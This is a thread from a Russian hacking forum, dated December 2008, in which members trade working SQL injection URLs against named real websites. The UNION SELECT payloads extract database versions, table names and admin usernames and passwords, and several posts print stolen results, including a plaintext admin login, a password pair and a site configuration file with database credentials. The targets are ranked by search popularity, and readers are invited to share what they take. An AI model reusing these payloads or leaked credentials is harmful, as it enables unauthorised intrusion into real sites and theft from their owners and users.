ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7251  
Старый 30.12.2008, 02:51
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

// Оффтоп
A чё это за naira_clients?
Обьясните плиз!
 
Ответить с цитированием

  #7252  
Старый 30.12.2008, 03:21
-=Razor=-
Новичок
Регистрация: 20.12.2008
Сообщений: 24
Провел на форуме:
1187799

Репутация: 62
По умолчанию

Цитата:
http://www.vfs.com/curriculum.php?id=3+union+select+1,2,3,unhex(hex(g roup_concat(table_name))),5+from+information_schem a.tables/*
ТИЦ:160
PR:6

5.0.22-standard-logwebmaster@localhostvfscom_db


Цитата:
http://www.womenastronomers.com/star.php?Id=3+union+select+1,2,3,4,concat(version( ),database(),user())/*
PR:2
4.1.22-standardwomenast_Astronomerswomenast_User@localhos t

Последний раз редактировалось -=Razor=-; 30.12.2008 в 03:32..
 
Ответить с цитированием

  #7253  
Старый 30.12.2008, 03:25
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
Отправить сообщение для ..::TROYAN::.. с помощью ICQ
По умолчанию

Код:
http://gta.com.ua/file_details.phtml?id=-824+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
gtacom_gta@localhost:5.0.51a-community:gtacom_gta
Код:
http://gta.com.ua/file_details.phtml?id=-824+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+limit+0,1--
Код:
http://gta.com.ua/file_details.phtml?id=-824+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+admin+limit+0,2--
adminus:lPO7YBB0

PR : 3
ТиЦ : 300

Последний раз редактировалось ..::TROYAN::..; 30.12.2008 в 04:34..
 
Ответить с цитированием

  #7254  
Старый 30.12.2008, 04:03
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Samuseum.org - PR5 ~1.5к
Цитата:
http://www.samuseum.org/calendar/event.php?uid=-418'+union+select+1,2,email,4,5,6,7,8,9,10,11,12,1 3,14,15,16+from+user/*
Brightstar.com.tw - PR3 ~0.5к
Цитата:
http://www.brightstar.com.tw/product_info_e.php?UID=-772'+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_w s(0x3a,name,pwd),13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33+from+admin/*
http://www.brightstar.com.tw/asp_admin/index.fcgi

Последний раз редактировалось sabe; 30.12.2008 в 05:55..
 
Ответить с цитированием

  #7255  
Старый 30.12.2008, 04:21
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

pro100.tv
Я конечно ХЗ но для меня это канал сектантов (CNL)
Целыми днями трындят о "боге", это ппц, сектанты херовы!!!111
Ни админки, ничё не нащёл, у них сайт из 1 файла штоле...

Код:
http://pro100.tv/comments.php?curid=-1'+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,VERSION(),DATABASE(),USER()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
А вот и сам канал
Код:
http://www.cnl.tv/watch_us/programs.php?programID=-1'+UNION+SELECT+concat_ws(0x3a,VERSION(),DATABASE(),USER())/*
Вывод в тайтле
Код:
5.0.45:cnl_tv_2008:cnl_tv_user@localhost
===============
Итого:
http://www.cnl.tv/admin/
emanuel:supertest
http://www.cnl.tv/admin/file_editor.inc.php токо чёто он не пахает
Прав нет =\
Зато конфиг есть
Код:
/mySQL
$DatabaseName 			= "cnltv3_utf8";
$DbHostName 			= "localhost";
$DbUserName 			= "cnltv3_cnluser";
$admin_password			= "cnlconnect"; // for admin directly in pages. like Read more function.
Серверный путь походу /home/cnl.tv/html
Аа... Или "D:/WebServers/home/nlbc/cnl.tv"; //D:/WebServers/home/192.168.0.24/www

Тута есть залитие имаг, если выбрать Flag icon то должна залиться в http://www.cnl.tv/mages/flags/ но толи у мя проксик левый толи прав нет

Последний раз редактировалось Ponchik; 30.12.2008 в 05:19..
 
Ответить с цитированием

  #7256  
Старый 30.12.2008, 05:13
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
Отправить сообщение для ..::TROYAN::.. с помощью ICQ
По умолчанию

Код:
http://guttenberg.org.ru/f_mess.php?thing=-3+union+select+1,2,3,4,concat(user(),0x3a,database(),0x3a,version()),6--
tarifsss_gb@localhost:tarifsss_gb:4.0.27-log
 
Ответить с цитированием

  #7257  
Старый 30.12.2008, 06:02
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

24rus.ru - PR6 ~2.5к
Цитата:
http://www.24rus.ru/print.php?UID=-35802+union+select+1,2,3,4,5,version(),7,8,9,10,11 ,12,13,14,15,16/*
хоть какойто вывод

19rus.ru - PR6 ~2.5к
Цитата:
http://www.19rus.ru/more.php?UID=8964+union+select+1,table_name,3,4,5, 6,7,8,9,10,11,12,13,14,15,16+from+information_sche ma.tables+limit+23,1/*
наслаждаемся пищей) делимся результатов в пм )
 
Ответить с цитированием

  #7258  
Старый 30.12.2008, 11:14
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию

http://www.alta.ru/faq.php?id=-1+union+select+concat_ws(char(32,45,32),admin_id,l ogin,password,checknum,agent,email,access),2,3,4,5 +from+altaru_dealers.svts_admins--
ТИЦ : 450 PR: 5
Есть форум с 2722 юзеров.
--------
 
Ответить с цитированием

  #7259  
Старый 30.12.2008, 17:06
vladvk
Новичок
Регистрация: 22.12.2008
Сообщений: 16
Провел на форуме:
59223

Репутация: 7
По умолчанию

http://www.medialine.com.ua/main.php?menu_item=-55/**/union/**/select/**/version()#
А далее мозгов не хватает
 
Ответить с цитированием

  #7260  
Старый 30.12.2008, 18:37
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Код:
http://www.megaprint.com.ua/product.php?idr=107&idt=-1+union+select+group_concat(table_name,0x3a,table_rows),2,3,4,5,6+from+information_schema.tables--
Цитата:
http://www.medialine.com.ua/main.php?menu_item=-55/**/union/**/select/**/version()#
А далее мозгов не хватает
Код:
http://www.medialine.com.ua/main.php?menu_item=-55/**/union/**/select/**/concat(login,0x3a,password)/**/from/**/users+limit+0,1--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ